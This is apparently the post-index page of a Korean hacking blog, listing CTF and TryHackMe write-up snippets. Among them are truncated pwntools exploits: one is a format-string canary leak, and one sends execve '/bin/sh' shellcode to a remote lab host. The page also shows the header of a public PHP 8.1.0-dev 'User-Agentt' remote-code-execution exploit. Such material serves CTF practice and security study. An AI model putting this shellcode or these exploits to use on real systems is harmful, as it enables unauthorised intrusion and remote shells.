본문 바로가기

hacking sorcerer

(373)
단팥죽 한 그릇 하실라예? 오 ''' $input = 6$ Address of init is in 9$ Canary is at 13$ Leaking in at init + Canary %9$lX.%13$lX ''' from pwn import * context.binary = binary = ELF("./killer.killer") p = process() p.recvuntil(b"stroke?") static_libc_csu_address = binary.symbols.__libc_csu_init payload = b'%9$lX.%13$lX' p.sendline(payload) p.recvuntil(b"confront:") output = p.recv().split(b"\n")[0] dynamic_init_libc = int(out..
원더랜드에 오신 것을 환영합니다 제가 옛날 옛날에 아주 재미있게 풀던 문제를 가져왔습니다. Tryhackme wonderland입니다. 설명은 귀찮아서 생략합니다 ㅋㅋㅋ 앞으로도 쉬운 건 그냥 생략하려구요 ㅋㅋㅋ
어느 날에 누군가가 지은 따끈한 코드 한 사발 하실라우? from pwn import * context.log_level = "debug" p = remote('10.10.194.218', 9004) shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05" #p = process() p.recv() output = p.recv() buffer_address = int(output.split(b"at")[1].strip().decode("utf-8"), 16) payload = shellcode + b'A'*(0x50 - len(shellcode)) + b'B'*0x8 + p64(buffer_address) p.sendline(..
제 주문은 콤비네이션인데요 import sys from itertools import combinations n, m = map(int, input().split()) words = sorted(list(map(str, sys.stdin.readline().split()))) arr = [] for i in range(0, m): arr.append(words[i]) arr.sort() print(arr) print(list(combinations(arr,n)))
우리 집에서 바이너리 보구 갈래? 2
에이전트 # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution # Date: 23 may 2021 # Exploit Author: flast101 # Vendor Homepage: https://www.php.net/ # Software Link: # - https://hub.docker.com/r/phpdaily/php # - https://github.com/phpdaily/php # Version: 8.1.0-dev # Tested on: Ubuntu 20.04 # References: # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a # -..
우리 집에서 바이너리 보구 갈래?
거북이의 습격 Tryhackme 0day 리뷰입니다. 그냥 노말한 문제로 기억합니다. 일단 기본적인 포트 조사를 하고 나서 발견된 취약점을 통해 안으로 파고듭니다. 그 다음 위에서 찾은 익스플로잇을 이용하여 root를 획득해서 플래그를 탈취하면 끝입니다. 참 쉽죠잉? 원래 뭐든 막상 해보면 쉬운 법입니다.